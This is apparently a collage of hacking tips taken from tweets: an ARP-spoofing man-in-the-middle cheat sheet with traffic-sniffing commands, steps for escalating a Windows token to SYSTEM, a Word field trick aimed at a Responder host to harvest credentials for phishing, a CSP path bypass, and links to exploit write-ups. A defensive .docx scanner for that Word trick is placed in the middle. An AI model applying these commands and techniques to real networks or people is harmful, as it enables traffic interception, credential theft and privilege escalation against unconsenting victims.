MitM Copy&Paste Sheet 😎
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"
- Enable SE_DEBUG_NAME (debug privileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now that we have duplicated the token, we can close the original.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME; these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up: revert back to self and close the handles.
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
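A defender-side check for the field trick above, added here as an example rather than taken from the tweet: it unpacks a .docx and flags IMPORT / INCLUDEPICTURE fields whose target is a UNC path or URL, since a remote target is what a credential-capturing document needs. The sample document is constructed in memory, the host is a placeholder, and the field-code syntax (doubled backslashes, `\d` for "data not stored in document") is my reading of how Word serialises the field.

```python
import html
import io
import re
import zipfile

# Field codes that fetch a picture from a path; IMPORT is the legacy name for INCLUDEPICTURE.
FIELD_RE = re.compile(r'\b(IMPORT|INCLUDEPICTURE)\s+"([^"]*)"', re.IGNORECASE)
# Targets that leave the machine: UNC paths and URLs.
REMOTE_RE = re.compile(r'^(\\\\|//|https?://|ftp://)', re.IGNORECASE)

def field_targets(xml_text):
    """Yield (field, target) pairs from document XML. Entities such as &quot; are
    decoded first so both <w:instrText> bodies and w:instr attributes are covered."""
    text = html.unescape(xml_text)
    for field, raw in FIELD_RE.findall(text):
        # Field-code quoting doubles backslashes: "\\\\host\\share" means \\host\share.
        yield field.upper(), raw.replace("\\\\", "\\")

def scan_docx(data):
    """Return [(part, field, target)] for every picture field in a .docx with a remote target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml_text = zf.read(name).decode("utf-8", errors="replace")
            for field, target in field_targets(xml_text):
                if REMOTE_RE.match(target):
                    findings.append((name, field, target))
    return findings

def build_sample_docx(instr):
    """Constructed minimal .docx with one field in word/document.xml (assumed layout, not Word output)."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           '<w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           '<w:r><w:instrText xml:space="preserve">' + html.escape(instr, quote=False) + '</w:instrText></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()

if __name__ == "__main__":
    # 10.0.0.1 is a placeholder host; \d is assumed to be the "data not stored in document" switch.
    bad = build_sample_docx(' IMPORT "\\\\\\\\10.0.0.1\\\\1.jpg" \\d ')
    good = build_sample_docx(' INCLUDEPICTURE "C:\\\\pics\\\\logo.png" ')
    print(scan_docx(bad))   # [('word/document.xml', 'IMPORT', '\\\\10.0.0.1\\1.jpg')]
    print(scan_docx(good))  # []
```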
Persistence: “the continued or prolonged existence of something”
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW
Persistence: “the continued or prolonged existence of something”: Part 1 – Microsoft Office – MDSec
If a CSP policy points to a directory and you use %2f to encode "/", the URL is still considered to be inside that directory. All browsers seem to agree on that.
This leads to a possible bypass by using "%2f..%2f" if the server decodes it; example: https://t.co/Dl9hkKtlQc
Taking control of VMware through the universal host controller interface
Part 1: https://www.zerodayinitiative.com/blog/2019/5/7/taking-control-of-vmware-through-the-universal-host-controller-interface-part-1
Part 2: https://www.zerodayinitiative.com/blog/2019/8/15/taking-control-of-vmware-through-the-universal-host-control-interface-part-2
#ITSecurity #pentest #hacking #hack #it